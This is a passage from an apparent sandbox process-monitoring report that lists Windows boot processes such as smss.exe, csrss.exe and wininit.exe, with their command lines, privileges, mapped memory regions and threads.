"0xe60b1e890" monitor_reason = "child_process" parent_id = "657" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36445 start_va = 0x0 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x (null)" filename = "" Region: id = 36446 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 36447 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 36448 start_va = 0x479e0000 end_va = 0x479f2fff entry_point = 0x479e0000 region_type = mapped_file name = "smss.exe" filename = "\\Windows\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe") Region: id = 36449 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36450 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36451 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36452 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36453 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1008 os_tid = 0xe4 Thread: id = 1009 os_tid = 0xe8 Thread: id = 1023 os_tid = 0x124 Thread: id = 1034 os_tid = 0x168 Process: id = "660" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x7f1d1040" os_pid = "0xec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "659" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36456 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36457 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 36458 start_va = 0x450000 end_va = 0x4f5fff entry_point = 0x450000 region_type = mapped_file name = "autochk.exe" filename = "\\Windows\\System32\\autochk.exe" (normalized: "c:\\windows\\system32\\autochk.exe") Region: id = 36459 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36460 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36461 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36462 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 36463 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1010 os_tid = 0xf0 Process: id = "661" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x7f1d1040" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "659" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 36502 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 36503 start_va = 0x479e0000 end_va = 0x479f2fff entry_point = 0x479e0000 region_type = mapped_file name = "smss.exe" filename = "\\Windows\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe") Region: id = 36504 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36505 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36506 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36507 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36508 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1024 os_tid = 0x12c Process: id = "662" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x7f1d1060" os_pid = "0x130" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "661" os_parent_pid = "0x128" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36511 start_va = 0x0 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x (null)" filename = "" Region: id = 36512 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 36513 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 36514 start_va = 0x4a300000 end_va = 0x4a304fff entry_point = 0x4a300000 region_type = mapped_file name = "csrss.exe" filename = "\\Windows\\System32\\csrss.exe" (normalized: "c:\\windows\\system32\\csrss.exe") Region: id = 36515 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36516 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36517 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36518 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 36519 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36520 start_va = 0x75cb0000 end_va = 0x75cbcfff entry_point = 0x75cb0000 region_type = mapped_file name = "csrsrv.dll" filename = "\\Windows\\System32\\csrsrv.dll" (normalized: "c:\\windows\\system32\\csrsrv.dll") Region: id = 36521 start_va = 0x75ca0000 end_va = 0x75cadfff entry_point = 0x75ca0000 region_type = mapped_file name = "basesrv.dll" filename = "\\Windows\\System32\\basesrv.dll" (normalized: "c:\\windows\\system32\\basesrv.dll") Region: id = 36522 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36523 start_va = 0x75c70000 end_va = 0x75c9bfff entry_point = 0x75c70000 region_type = mapped_file name = "winsrv.dll" filename = "\\Windows\\System32\\winsrv.dll" (normalized: "c:\\windows\\system32\\winsrv.dll") Region: id = 36524 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36525 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36526 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36527 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36528 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36529 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36530 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36535 start_va = 0x100000 end_va = 0x166fff entry_point = 0x100000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36536 start_va = 0x170000 end_va = 0x176fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 36537 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 36538 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 36539 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x1a0000 region_type = mapped_file name = "vgasys.fon" filename = "\\Windows\\Fonts\\vgasys.fon" (normalized: "c:\\windows\\fonts\\vgasys.fon") Region: id = 36540 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 36541 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 36542 start_va = 0x500000 end_va = 0x8f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 36543 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 36544 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 36545 start_va = 0x75c60000 end_va = 0x75c68fff entry_point = 0x75c60000 region_type = mapped_file name = "sxssrv.dll" filename = "\\Windows\\System32\\sxssrv.dll" (normalized: "c:\\windows\\system32\\sxssrv.dll") Region: id = 36546 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 36547 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 36717 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 36718 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 36719 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 36720 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 36721 start_va = 0x900000 end_va = 0x9c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 36722 start_va = 0xaa0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 36723 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 36724 start_va = 0xbd0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 36725 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 36726 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36727 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 36728 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 36779 start_va = 0x250000 end_va = 0x256fff entry_point = 0x250000 region_type = mapped_file name = "marlett.ttf" filename = "\\Windows\\Fonts\\marlett.ttf" (normalized: "c:\\windows\\fonts\\marlett.ttf") Region: id = 36780 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 36781 start_va = 0x280000 end_va = 0x29ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 36782 start_va = 0xb40000 end_va = 0xbbefff entry_point = 0xb40000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 36783 start_va = 0xc10000 end_va = 0x180ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c10000" filename = "" Region: id = 36784 start_va = 0x75bb0000 end_va = 0x75c0efff entry_point = 0x75bb0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 36785 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36786 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 36795 start_va = 0x1870000 end_va = 0x18affff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 36796 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 36797 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36807 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36818 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36829 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36914 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36915 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 36916 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 36917 start_va = 0x1830000 end_va = 0x186ffff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 36918 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 37109 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 37110 start_va = 0x18b0000 end_va = 0x192ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000018b0000" filename = "" Region: id = 38069 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 38070 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 38071 start_va = 0xa50000 end_va = 0xa5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 38072 start_va = 0xa60000 end_va = 0xa61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 38073 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 38074 start_va = 0xa80000 end_va = 0xa8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 38075 start_va = 0xa90000 end_va = 0xa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 38076 start_va = 0xae0000 end_va = 0xae1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 38077 start_va = 0x1930000 end_va = 0x19affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 38078 start_va = 0x19b0000 end_va = 0x1a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019b0000" filename = "" Region: id = 38082 start_va = 0xae0000 end_va = 0xae0fff entry_point = 0xae0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 38083 start_va = 0xaf0000 end_va = 0xaf1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 38827 start_va = 0xae0000 end_va = 0xaeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 38828 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000af0000" filename = "" Region: id = 38829 start_va = 0xbc0000 end_va = 0xbc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Thread: id = 1025 os_tid = 0x134 Thread: id = 1030 os_tid = 0x148 Thread: id = 1031 os_tid = 0x14c Thread: id = 1032 os_tid = 0x150 Thread: id = 1033 os_tid = 0x154 Thread: id = 1042 os_tid = 0x18c Thread: id = 1050 os_tid = 0x1a8 Thread: id = 1051 os_tid = 0x1ac Thread: id = 1057 os_tid = 0x1cc Thread: id = 1062 os_tid = 0x1e4 Process: id = "663" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x7f1d1080" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "659" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36548 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 36549 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 36550 start_va = 0x479e0000 end_va = 0x479f2fff entry_point = 0x479e0000 region_type = mapped_file name = "smss.exe" filename = "\\Windows\\System32\\smss.exe" (normalized: "c:\\windows\\system32\\smss.exe") Region: id = 36551 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36552 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36553 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36554 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 36555 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Thread: id = 1035 os_tid = 0x15c Process: id = "664" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x7f1d10a0" os_pid = "0x160" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "661" os_parent_pid = "0x128" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 36556 start_va = 0x110000 end_va = 0x129fff entry_point = 0x110000 region_type = mapped_file name = "wininit.exe" filename = "\\Windows\\System32\\wininit.exe" (normalized: "c:\\windows\\system32\\wininit.exe") Region: id = 36557 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 36558 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 36559 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 36560 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 36561 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 36562 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 36563 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 36608 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 36609 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 36610 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 36611 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 36612 start_va = 0x20000 end_va = 0x86fff entry_point = 0x20000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 36613 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 36614 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 36615 start_va = 0x77c60000 end_va = 0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 36616 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 36617 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 36618 start_va = 0x77c80000 end_va = 0x77d20fff entry_point = 0x77c80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 36619 start_va = 0x77c40000 end_va = 0x77c58fff entry_point = 0x77c40000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 36620 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 36621 start_va = 0x4d0000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36622 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36623 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 36624 start_va = 0x90000 end_va = 0xacfff entry_point = 0x90000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36625 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 36626 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 36627 start_va = 0x2a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 36628 start_va = 0x90000 end_va = 0x96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 36629 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 36630 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 36631 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 36632 start_va = 0x4d0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 36633 start_va = 0x690000 end_va = 0x69ffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 36634 start_va = 0x6a0000 end_va = 0xa92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 36635 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 36636 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 36637 start_va = 0x75c40000 